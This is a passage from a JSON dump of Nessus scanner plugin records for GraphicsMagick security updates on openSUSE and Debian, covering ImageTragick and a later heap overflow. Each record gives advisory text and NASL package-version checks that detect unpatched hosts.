\"42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-debugsource-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"GraphicsMagick-devel-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-Q16-12-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick++-devel-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagick3-config-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-1.3.25-63.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"perl-GraphicsMagick-debuginfo-1.3.25-63.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-03-27T14:57:00", "description": "This update for GraphicsMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061] (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-20T00:00:00", "type": "nessus", "title": "openSUSE Security Update : GraphicsMagick (openSUSE-2016-602) (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:GraphicsMagick", "p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo", "p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource", "p-cpe:/a:novell:opensuse:GraphicsMagick-devel", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-11", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-11-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-3", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libgraphicsmagick%2b%2b-devel", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3", "p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo", "p-cpe:/a:novell:opensuse:libGraphicsMagick3-config", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2", "p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick", "p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-602.NASL", "href": "https://www.tenable.com/plugins/nessus/91272", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-602.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91272);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"openSUSE Security Update : GraphicsMagick (openSUSE-2016-602) (ImageTragick)\");\n script_summary(english:\"Check for the openSUSE-2016-602 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for GraphicsMagick fixes the following issues :\n\nSecurity issues fixed :\n\n - Multiple security issues in GraphicsMagick/ImageMagick\n [boo#978061] (CVE-2016-3714, CVE-2016-3718,\n CVE-2016-3715, CVE-2016-3717)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=978061\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected GraphicsMagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick-Q16-3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagick3-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libGraphicsMagickWand-Q16-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-debugsource-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"GraphicsMagick-devel-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick++-Q16-3-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick++-Q16-3-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick++-devel-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick-Q16-3-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagick3-config-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagickWand-Q16-2-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-GraphicsMagick-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"perl-GraphicsMagick-debuginfo-1.3.20-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-debugsource-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"GraphicsMagick-devel-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick++-Q16-11-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick++-Q16-11-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick++-devel-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick-Q16-3-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick-Q16-3-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagick3-config-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagickWand-Q16-2-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libGraphicsMagickWand-Q16-2-debuginfo-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-GraphicsMagick-1.3.21-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"perl-GraphicsMagick-debuginfo-1.3.21-5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-debuginfo / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:55:45", "description": "Several security vulnerabilities were discovered in graphicsmagick a tool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by vulnerabilities collectively known as ImageTragick, that are the consequence of lack of sanitization of untrusted input. An attacker with control on the image input could, with the privileges of the user running the application, execute code (CVE-2016-3714), make HTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made :\n\n1. Remove automatic detection/execution of MVG based on file header or file extension.\n\n2. Remove the ability to cause an input file to be deleted based on a filename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support, removing manual page support, and by adding -dSAFER to all ghostscript invocations.\n\n4. Sanity check the MVG image primitive filename argument to assure that 'magick:' prefix strings will not be interpreted. Please note that this patch will break intentional uses of magick prefix strings in MVG and so some MVG scripts may fail. We will search for a more flexible solution.\n\nIn addition the following issues have been fixed :\n\nCVE-2015-8808 Assure that GIF decoder does not use unitialized data and cause an out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318 Vulnerabilities that allow to read or write outside memory bounds (heap, stack) as well as some NULL pointer derreferences to cause a denial of service when parsing SVG files.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-24T00:00:00", "type": "nessus", "title": "Debian DLA-484-1 : graphicsmagick security update (ImageTragick)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8808", "CVE-2016-2317", "CVE-2016-2318", "CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-484.NASL", "href": "https://www.tenable.com/plugins/nessus/91299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-484-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91299);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2015-8808\", \"CVE-2016-2317\", \"CVE-2016-2318\", \"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-484-1 : graphicsmagick security update (ImageTragick)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security vulnerabilities were discovered in graphicsmagick a\ntool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, execute code (CVE-2016-3714), make HTTP GET\nor FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made :\n\n1. Remove automatic detection/execution of MVG based on file header or\nfile extension.\n\n2. Remove the ability to cause an input file to be deleted based on a\nfilename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support,\nremoving manual page support, and by adding -dSAFER to all ghostscript\ninvocations.\n\n4. Sanity check the MVG image primitive filename argument to assure\nthat 'magick:' prefix strings will not be interpreted. Please note\nthat this patch will break intentional uses of magick prefix strings\nin MVG and so some MVG scripts may fail. We will search for a more\nflexible solution.\n\nIn addition the following issues have been fixed :\n\nCVE-2015-8808 Assure that GIF decoder does not use unitialized data\nand cause an out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318 Vulnerabilities that allow to read or\nwrite outside memory bounds (heap, stack) as well as some NULL pointer\nderreferences to cause a denial of service when parsing SVG files.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/05/msg00037.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:34:44", "description": "A remote denial of service vulnerability has been discovered in graphicsmagick, a collection of image processing tools and associated libraries.\n\nA specially crafted file can be used to produce a heap-based buffer overflow and application crash by exploiting a defect in the AcquireCacheNexus function in magick/pixel_cache.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u14.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNote: The previous graphicsmagick package inadvertently introduced a dependency on liblcms2-2. This version of the package returns to using liblcms1. If your system does not otherwise require liblcms2-2, you may want to consider removing it following the graphicsmagick upgrade.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-13T00:00:00", "type": "nessus", "title": "Debian DLA-1168-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16669"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1168.NASL", "href": "https://www.tenable.com/plugins/nessus/104501", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1168-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104501);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-16669\");\n\n script_name(english:\"Debian DLA-1168-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote denial of service vulnerability has been discovered in\ngraphicsmagick, a collection of image processing tools and associated\nlibraries.\n\nA specially crafted file can be used to produce a heap-based buffer\noverflow and application crash by exploiting a defect in the\nAcquireCacheNexus function in magick/pixel_cache.c.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u14.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNote: The previous graphicsmagick package inadvertently introduced a\ndependency on liblcms2-2. This version of the package returns to using\nliblcms1. If your system does not otherwise require liblcms2-2, you\nmay want to consider removing it following the graphicsmagick upgrade.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/11/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/10\");\n 